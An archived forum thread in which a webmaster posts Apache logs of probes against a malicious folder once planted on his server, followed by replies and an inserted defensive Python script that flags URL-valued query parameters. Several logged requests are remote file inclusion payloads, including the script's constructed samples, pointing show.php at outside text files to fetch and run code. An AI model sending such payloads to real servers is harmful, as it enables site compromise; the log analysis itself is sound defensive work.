Some assistance with Apache log excerpts - Printable Version


Some assistance with Apache log excerpts by MeEtc on 08-28-2012 at 09:19 PM

code:
157.55.48.122 - - [08/Jun/2012:17:42:44 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2757 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
187.40.24.226 - - [18/Jun/2012:17:05:03 -0400] "GET /euhsd/show.php?pg=http://wikiteca.iesb.br/wikiteca/NewDir/opa.txt? HTTP/1.1" 404 2716 "-" "Mozilla/3.0 (compatible; Indy Library)"
157.55.109.246 - - [20/Jun/2012:07:51:12 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2764 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
200.243.30.2 - - [22/Jun/2012:16:05:18 -0400] "GET /euhsd/show.php?pg=http://www.uniaogaucha.org/images/galeria/ab2k1/upx.txt? HTTP/1.1" 404 2653 "-" "-"
186.194.6.158 - - [24/Jun/2012:10:23:14 -0400] "GET /euhsd/show.php?pg=http://euribors.com/send.txt? HTTP/1.1" 404 2678 "-" "Mozilla/3.0 (compatible; Indy Library)"
95.132.186.112 - - [27/Jun/2012:16:03:14 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
95.132.186.112 - - [27/Jun/2012:16:03:15 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
95.132.186.112 - - [27/Jun/2012:16:03:17 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
157.55.48.122 - - [06/Jul/2012:05:56:07 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2726 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.55.109.245 - - [08/Jul/2012:04:14:05 -0400] "GET /euhsd/show.php?pg=650642650642 HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
78.158.11.226 - - [12/Jul/2012:09:30:07 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.0" 404 2857 "http://sameid.net/domain/yetanothersig.com/" "Lynx/2.8.5rel.1 libwww-FM/2.14FC SSL-MM/1.4.1b OpenSSL/0.9.7d-dev"
157.55.109.245 - - [13/Jul/2012:19:44:22 -0400] "GET /euhsd/show.php?pg=897130897130 HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
94.23.225.68 - - [22/Jul/2012:08:22:11 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.225.68 - - [22/Jul/2012:08:22:11 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
157.56.93.231 - - [25/Jul/2012:08:16:53 -0400] "GET /euhsd/show.php?pg=650642650642 HTTP/1.1" 404 2763 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.56.93.226 - - [26/Jul/2012:08:58:55 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.56.93.218 - - [26/Jul/2012:19:54:45 -0400] "GET /euhsd/show.php?pg=897130897130 HTTP/1.1" 404 2761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
199.187.122.90 - - [27/Jul/2012:22:11:03 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 2727 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
189.48.123.38 - - [03/Aug/2012:12:44:44 -0400] "GET /euhsd/show.php?pg=http://wikiteca.iesb.br/wikiteca/newdir/opa.txt?&&r=s& HTTP/1.1" 404 2643 "-" "-"
94.23.225.68 - - [05/Aug/2012:19:19:03 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.220.161 - - [06/Aug/2012:16:05:55 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2612 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.225.68 - - [19/Aug/2012:00:04:21 -0400] "GET /euhsd/show.php?pg=594585594585 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"

The folder /euhsd/ was a malicious folder of files placed on my webserver a few years back when I got a virus that copied my FTP password. I have noticed that it still tries to get a lot of attention. I only looked through 3 months of logs, but I could go back more if needed. Is it possible to help track down what the source of this is? And no, I did not keep a copy of the files that were in the folder.

RE: Some assistance with Apache log excerpts by Menthix on 08-28-2012 at 09:38 PM

Well, it is still listed in Google, and possibly others: https://encrypted.google.com/search?q=inurl%3A%2Feuhsd%2Fshow.php

Those hitting it are probably individuals/bots/botnets who look for signs of infected sites on search engines and try to get in your server. But since everything 404s you shouldn't have anything to worry about.

Some bots (quite a lot actually) also just try common malware paths on random sites BTW. If you try a massive load a day you'll get lucky sooner or later :p.

EDIT:
All those 157.* ones are legit Microsoft IPs BTW, MSN/Bing bots trying to index your site.
(It kinda annoys me how long and often search engines keep hammering 404 URLs these days... in the same kind of situation with a site of mine and Google.)


RE: Some assistance with Apache log excerpts by MeEtc on 08-28-2012 at 10:45 PM

One of the GET params is the URL http://wikiteca.iesb.br/wikiteca/newdir/opa.txt. Rather interesting contents.
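
Added example, not part of the original thread: a small triage script that parses Apache combined-format lines and flags requests whose query string carries an absolute URL as a parameter value, the pattern pointed out in the post above, then separates the ones that were not answered with a 4xx. The sample log is constructed (documentation-range addresses and example.* hosts), and the function names are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined": host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample in the shape of the thread's excerpt; addresses and
# hosts are placeholders, and the last request line is a made-up 200 case.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Jun/2012:17:05:03 -0400] "GET /euhsd/show.php?pg=http://files.example.org/dir/a.txt? HTTP/1.1" 404 2716 "-" "Mozilla/3.0 (compatible; Indy Library)"
198.51.100.7 - - [20/Jun/2012:07:51:12 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2764 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
203.0.113.5 - - [03/Aug/2012:12:44:44 -0400] "GET /euhsd/show.php?pg=http://files.example.org/dir/a.txt?&&r=s& HTTP/1.1" 404 2643 "-" "-"
203.0.113.9 - - [04/Aug/2012:01:02:03 -0400] "GET /index.php?pg=HTTP://files.example.net/b.txt HTTP/1.1" 200 5120 "-" "-"
this line is not in combined format
"""

def find_url_params(log_text):
    """Return (findings, unparsed_count). A finding is a request with an
    absolute URL as the value of a query parameter."""
    findings, unparsed = [], 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            unparsed += 1          # count, do not silently drop, odd lines
            continue
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so pg=http%3A%2F%2F... is caught too
        for name, value in parse_qsl(parts.query):
            if URL_VALUE_RE.match(value):
                findings.append({"host": m["host"], "path": parts.path,
                                 "param": name, "status": int(m["status"]),
                                 "agent": m["agent"]})
    return findings, unparsed

def needs_review(findings):
    """Findings not answered with a 4xx: check how that script uses the parameter."""
    return [f for f in findings if not 400 <= f["status"] < 500]

if __name__ == "__main__":
    hits, skipped = find_url_params(SAMPLE_LOG)
    for h in needs_review(hits):
        print(h["host"], h["path"], h["param"], h["status"])
    print(f"{len(hits)} URL-valued parameters, {skipped} unparsed line(s)")
```

Entries that all returned 404, as in the excerpt posted in this thread, land in the findings list but not in the review list.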


RE: Some assistance with Apache log excerpts by blessedguy on 08-28-2012 at 11:44 PM

quote:
Originally posted by MeEtc
One of the GET params is the URL http://wikiteca.iesb.br/wikiteca/newdir/opa.txt. Rather interesting contents.

Replying! ops!!!